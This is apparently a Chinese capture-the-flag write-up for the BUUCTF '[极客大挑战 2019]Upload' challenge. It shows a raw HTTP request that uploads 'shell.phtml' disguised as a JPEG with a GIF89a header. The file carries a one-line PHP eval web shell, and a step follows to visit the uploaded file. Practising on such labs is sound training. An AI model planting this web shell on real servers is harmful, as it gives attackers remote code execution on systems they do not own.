题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]Upload
![BUUCTF:[极客大挑战 2019]Upload_xml](https://file.cfanz.cn/uploads/png/2023/06/19/20/0e62267U57.png "在这里插入图片描述")
![BUUCTF:[极客大挑战 2019]Upload_xml_02](https://file.cfanz.cn/uploads/png/2023/06/19/20/42161RGf4d.png "在这里插入图片描述")
POST /upload_file.php HTTP/1.1
Host: b40c1d53-d3d6-43be-9f6d-67c767946f8c.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1802129172967531631889721345
Content-Length: 397
Origin: http://b40c1d53-d3d6-43be-9f6d-67c767946f8c.node3.buuoj.cn
Connection: close
Referer: http://b40c1d53-d3d6-43be-9f6d-67c767946f8c.node3.buuoj.cn/
Upgrade-Insecure-Requests: 1
-----------------------------1802129172967531631889721345
Content-Disposition: form-data; name="file"; filename="shell.phtml"
Content-Type: image/jpeg
GIF89a? <script language="php">eval($_POST['mochu7'])</script>
-----------------------------1802129172967531631889721345
Content-Disposition: form-data; name="submit"
æ交
-----------------------------1802129172967531631889721345--![BUUCTF:[极客大挑战 2019]Upload_xml_03](https://file.cfanz.cn/uploads/png/2023/06/19/20/BcWQ61B403.png "在这里插入图片描述")
访问
/upload/shell.phtml![BUUCTF:[极客大挑战 2019]Upload_3d_04](https://file.cfanz.cn/uploads/png/2023/06/19/20/0692bT6115.png "在这里插入图片描述")
![BUUCTF:[极客大挑战 2019]Upload_html_05](https://file.cfanz.cn/uploads/png/2023/06/19/20/UOe240XA19.png "在这里插入图片描述")
